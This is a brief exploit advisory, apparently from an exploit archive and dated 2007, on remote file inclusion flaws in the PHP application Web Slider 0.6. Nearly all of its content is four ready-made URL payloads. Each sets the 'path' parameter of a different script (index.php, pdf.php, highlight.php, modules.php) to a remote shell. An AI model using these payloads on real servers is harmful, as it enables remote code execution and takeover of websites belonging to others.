id: 1763
date: 04/14/2007
title: Web Slider 0.6 (path) Remote File Inclusion Vulnerabilities
author: GoLd_M
cves: 

===========================================================
Web Slider 0.6 (path) Remote File Inclusion Vulnerabilities
===========================================================


# Web Slider 0.6(path)Remote File Inclusion Vulnerabilities
# D.Script: http://sourceforge.net/projects/webslider/
# Discovered by: GolD_M = [Mahmood_ali]
# Exploit:[Path]/index.php?path=Shell
# Exploit:[Path]/modules/pdf.php?path=Shell
# Exploit:[Path]/plugins/highlight.php?path=Shell
# Exploit:[Path]/include/modules.php?path=Shell



#  0day.today [2023-03-26]  #